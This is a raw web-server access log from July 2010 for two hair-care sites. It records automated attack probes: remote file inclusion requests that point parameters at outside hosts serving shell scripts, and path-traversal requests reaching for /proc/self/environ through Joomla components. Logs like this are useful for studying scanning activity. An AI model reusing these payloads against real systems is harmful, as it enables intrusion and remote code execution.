129.97.219.71 - - [11/Jul/2010:19:21:55 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)" "growlonghairfast.com"
78.110.50.120 - - [11/Jul/2010:19:24:32 -0700] "GET /logs//index.php/index.php?mosConfig_absolute_path=http://www.gitct.kr/eng/.id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.120 - - [11/Jul/2010:19:24:32 -0700] "GET /index.php/index.php?mosConfig_absolute_path=http://www.gitct.kr/eng/.id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.120 - - [11/Jul/2010:19:24:32 -0700] "GET /logs/access_100607.log%20%20//index.php/index.php?mosConfig_absolute_path=http://www.gitct.kr/eng/.id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
187.40.22.192 - - [11/Jul/2010:19:24:54 -0700] "GET /logs/access_100607.log/citeglligh3rforum.guiadohacker.com.br/showthread.php?t=http://www.unixsend.xpg.com.br/test.txt?&&s=r& HTTP/1.0" 404 - "-" "Mozilla/3.0 (compatible; Indy Library)" "www.freehairsecrets.com"
78.110.50.120 - - [11/Jul/2010:19:25:19 -0700] "GET /logs//index.php/index.php?mosConfig_absolute_path=http://www.gitct.kr/eng/.id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.120 - - [11/Jul/2010:19:25:19 -0700] "GET /logs/access_100607.log//index.php/index.php?mosConfig_absolute_path=http://www.gitct.kr/eng/.id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.120 - - [11/Jul/2010:19:25:19 -0700] "GET /index.php/index.php?mosConfig_absolute_path=http://www.gitct.kr/eng/.id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
151.97.124.201 - - [11/Jul/2010:19:26:21 -0700] "GET /logs/access.log//index.php/web2?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
151.97.124.201 - - [11/Jul/2010:19:26:21 -0700] "GET /index.php/web2?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
151.97.124.201 - - [11/Jul/2010:19:26:21 -0700] "GET /logs//index.php/web2?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
151.97.124.201 - - [11/Jul/2010:19:26:29 -0700] "GET /logs/access.log//index.php/web2?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
151.97.124.201 - - [11/Jul/2010:19:26:29 -0700] "GET /index.php/web2?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
151.97.124.201 - - [11/Jul/2010:19:26:30 -0700] "GET /logs//index.php/web2?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
91.121.78.216 - - [11/Jul/2010:19:26:58 -0700] "GET /logs/access.log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.78.216 - - [11/Jul/2010:19:26:59 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.78.216 - - [11/Jul/2010:19:26:59 -0700] "GET /logs//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.78.216 - - [11/Jul/2010:19:27:00 -0700] "GET /logs/access_100705.log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.78.216 - - [11/Jul/2010:19:27:00 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.78.216 - - [11/Jul/2010:19:27:00 -0700] "GET /logs//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.78.216 - - [11/Jul/2010:19:27:15 -0700] "GET /logs/access.log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.78.216 - - [11/Jul/2010:19:27:15 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.78.216 - - [11/Jul/2010:19:27:15 -0700] "GET /logs//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.78.216 - - [11/Jul/2010:19:27:16 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.78.216 - - [11/Jul/2010:19:27:16 -0700] "GET /logs/access_100705.log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.78.216 - - [11/Jul/2010:19:27:16 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.78.216 - - [11/Jul/2010:19:27:16 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.78.216 - - [11/Jul/2010:19:27:16 -0700] "GET /logs//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.78.216 - - [11/Jul/2010:19:27:18 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.78.216 - - [11/Jul/2010:19:27:18 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
151.97.124.201 - - [11/Jul/2010:19:27:25 -0700] "GET /logs/access.log//index.php/web2?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
151.97.124.201 - - [11/Jul/2010:19:27:25 -0700] "GET /index.php/web2?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
151.97.124.201 - - [11/Jul/2010:19:27:25 -0700] "GET /logs//index.php/web2?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
203.252.71.232 - - [11/Jul/2010:19:27:28 -0700] "GET /logs/access_100705.log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.252.71.232 - - [11/Jul/2010:19:27:29 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.252.71.232 - - [11/Jul/2010:19:27:30 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
203.252.71.232 - - [11/Jul/2010:19:27:32 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.252.71.232 - - [11/Jul/2010:19:27:32 -0700] "GET /logs//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.252.71.232 - - [11/Jul/2010:19:27:32 -0700] "GET /logs/access.log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
203.252.71.232 - - [11/Jul/2010:19:27:33 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
203.252.71.232 - - [11/Jul/2010:19:27:33 -0700] "GET /logs//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
151.97.124.201 - - [11/Jul/2010:19:27:34 -0700] "GET /logs/access.log//index.php/web2?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
151.97.124.201 - - [11/Jul/2010:19:27:34 -0700] "GET /index.php/web2?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
151.97.124.201 - - [11/Jul/2010:19:27:35 -0700] "GET /logs//index.php/web2?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
203.252.71.232 - - [11/Jul/2010:19:27:37 -0700] "GET /logs/access_100705.log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.252.71.232 - - [11/Jul/2010:19:27:38 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.252.71.232 - - [11/Jul/2010:19:27:38 -0700] "GET /logs//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.252.71.232 - - [11/Jul/2010:19:27:39 -0700] "GET /logs/access.log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
203.252.71.232 - - [11/Jul/2010:19:27:39 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
203.252.71.232 - - [11/Jul/2010:19:27:39 -0700] "GET /logs//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
91.121.78.216 - - [11/Jul/2010:19:27:43 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
78.110.50.120 - - [11/Jul/2010:19:27:44 -0700] "GET /logs/access_100125.log//index.php/index.php?mosConfig_absolute_path=http://www.gitct.kr/eng/.id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.78.216 - - [11/Jul/2010:19:27:49 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
78.110.50.120 - - [11/Jul/2010:19:27:56 -0700] "GET /logs/access_100125.log%20%20//index.php/index.php?mosConfig_absolute_path=http://www.gitct.kr/eng/.id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
203.252.71.232 - - [11/Jul/2010:19:28:06 -0700] "GET /logs/access.log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
203.252.71.232 - - [11/Jul/2010:19:28:07 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
203.252.71.232 - - [11/Jul/2010:19:28:07 -0700] "GET /logs//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
91.121.78.216 - - [11/Jul/2010:19:28:20 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.78.216 - - [11/Jul/2010:19:28:35 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.78.216 - - [11/Jul/2010:19:28:38 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.78.216 - - [11/Jul/2010:19:28:53 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
216.104.15.134 - - [11/Jul/2010:19:28:57 -0700] "GET /logs/access.log//index.php HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
91.121.78.216 - - [11/Jul/2010:19:29:36 -0700] "GET /logs/access.log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.78.216 - - [11/Jul/2010:19:29:37 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.78.216 - - [11/Jul/2010:19:29:37 -0700] "GET /logs//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.78.216 - - [11/Jul/2010:19:29:38 -0700] "GET /logs/access.log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.78.216 - - [11/Jul/2010:19:29:38 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.78.216 - - [11/Jul/2010:19:29:38 -0700] "GET /logs//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.78.216 - - [11/Jul/2010:19:29:57 -0700] "GET /logs/access_100705.log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.78.216 - - [11/Jul/2010:19:29:57 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.78.216 - - [11/Jul/2010:19:29:57 -0700] "GET /logs/access_100705.log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.78.216 - - [11/Jul/2010:19:29:57 -0700] "GET /logs//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.78.216 - - [11/Jul/2010:19:29:58 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.78.216 - - [11/Jul/2010:19:29:58 -0700] "GET /logs//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.201.66.31 - - [11/Jul/2010:19:31:36 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "[url=http://www.seks-ruletka.com/main.php?p=524] \xc7\xc0\xd0\xc0\xc1\xce\xd2\xc0\xc9 \xcb\xc8\xcc\xce\xcd \xc1\xc0\xca\xd1\xce\xc2[/url]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322)" "growlonghairfast.com"
91.201.66.31 - - [11/Jul/2010:19:31:36 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322)" "growlonghairfast.com"
91.121.78.216 - - [11/Jul/2010:19:31:46 -0700] "GET /logs/access.log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.78.216 - - [11/Jul/2010:19:31:47 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.78.216 - - [11/Jul/2010:19:31:47 -0700] "GET /logs//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.78.216 - - [11/Jul/2010:19:31:47 -0700] "GET /logs/access_100705.log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.78.216 - - [11/Jul/2010:19:31:47 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.78.216 - - [11/Jul/2010:19:31:48 -0700] "GET /logs//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.78.216 - - [11/Jul/2010:19:32:09 -0700] "GET /logs/access.log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.78.216 - - [11/Jul/2010:19:32:09 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.78.216 - - [11/Jul/2010:19:32:10 -0700] "GET /logs//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.78.216 - - [11/Jul/2010:19:32:10 -0700] "GET /logs/access_100705.log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.78.216 - - [11/Jul/2010:19:32:10 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.78.216 - - [11/Jul/2010:19:32:10 -0700] "GET /logs//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
129.97.219.71 - - [11/Jul/2010:19:32:51 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "growlonghairfast.com"
95.154.248.22 - - [11/Jul/2010:19:33:14 -0700] "GET /logs/access_100412.log//components/com_flyspray/startdown.php?file=http://www.yangsheng.ru/board/fx29id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
95.154.248.22 - - [11/Jul/2010:19:33:14 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.yangsheng.ru/board/fx29id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
95.154.248.22 - - [11/Jul/2010:19:33:14 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.yangsheng.ru/board/fx29id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
95.154.248.22 - - [11/Jul/2010:19:33:14 -0700] "GET /logs/access_100426.log//components/com_flyspray/startdown.php?file=http://www.yangsheng.ru/board/fx29id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
129.97.219.71 - - [11/Jul/2010:19:44:26 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "growlonghairfast.com"
208.80.193.37 - - [11/Jul/2010:19:49:26 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; knst; knst2007; Editor 3.0 - http://www.e-ditor.com; .NET CLR 1.1.4322)" "www.growlonghairfast.com"
193.105.210.172 - - [11/Jul/2010:19:50:45 -0700] "GET /logs/access_100208.log HTTP/1.0" 200 1703936 "http://growlonghairfast.com/logs/access_100208.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)" "growlonghairfast.com"
129.97.219.71 - - [11/Jul/2010:19:56:01 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "growlonghairfast.com"
208.115.111.248 - - [11/Jul/2010:19:56:46 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
67.195.114.60 - - [11/Jul/2010:19:58:31 -0700] "GET /logs/access.log HTTP/1.0" 200 48611 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
208.115.111.245 - - [11/Jul/2010:20:07:02 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
129.97.219.71 - - [11/Jul/2010:20:08:00 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "growlonghairfast.com"
188.127.248.175 - - [11/Jul/2010:20:10:54 -0700] "GET /logs/access_100301.log//include/write.php?dir=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.127.248.175 - - [11/Jul/2010:20:10:54 -0700] "GET /logs//include/write.php?dir=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.127.248.175 - - [11/Jul/2010:20:10:55 -0700] "GET /include/write.php?dir=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
